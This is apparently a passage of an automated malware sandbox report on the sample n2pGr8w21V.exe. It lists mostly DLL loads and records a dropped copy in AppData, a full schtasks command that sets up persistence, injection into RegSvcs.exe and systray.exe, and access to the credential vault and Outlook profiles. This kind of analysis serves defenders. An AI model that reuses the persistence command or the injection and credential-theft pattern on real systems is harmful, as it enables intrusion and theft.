                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: n2pGr8w21V.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: n2pGr8w21V.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: n2pGr8w21V.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISaSZznjXcpoJ.exe, 00000016.00000002.2507158297.000000000081E000.00000002.00000001.01000000.0000000E.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2509185482.000000000081E000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdb source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdbSHA256g source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: n2pGr8w21V.exeStatic PE information: 0x8BCFF9D5 [Sat Apr 30 21:02:13 2044 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004071DE push 6FB25C47h; retf 15_2_004071E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004031B0 push eax; ret 15_2_004031B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040B9B7 push ebp; retf 15_2_0040B9BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf 15_2_004172F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004133E3 push ss; retn A658h15_2_0041350B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00414BF2 push edi; ret 15_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00414C28 push edi; ret 15_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00418D95 pushfd ; retf 15_2_00418DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00415661 push edx; iretd 15_2_00415662
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156225F pushad ; ret 15_2_015627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015627FA pushad ; ret 15_2_015627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015909AD push ecx; mov dword ptr [esp], ecx15_2_015909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156283D push eax; iretd 15_2_01562858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156135E push eax; iretd 15_2_01561369
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_05754C35 pushfd ; retf 17_2_05754C41
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575F1A0 push eax; retf 17_2_0575F1A1
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575B1AF push eax; mov dword ptr [esp], edx17_2_0575B1C4
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575DCA0 push esp; ret 17_2_0575DCA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C54D pushfd ; ret 21_2_0140C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C54F push 8B013967h; ret 21_2_0140C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C09AD push ecx; mov dword ptr [esp], ecx21_2_013C09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C9D7 push edi; ret 21_2_0140C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01391FEC push eax; iretd 21_2_01391FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01417E99 push ecx; ret 21_2_01417EAC
                Source: n2pGr8w21V.exeStatic PE information: section name: .text entropy: 7.249824395566697
                Source: uEugNEto.exe.0.drStatic PE information: section name: .text entropy: 7.249824395566697
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile created: C:\Users\user\AppData\Roaming\uEugNEto.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
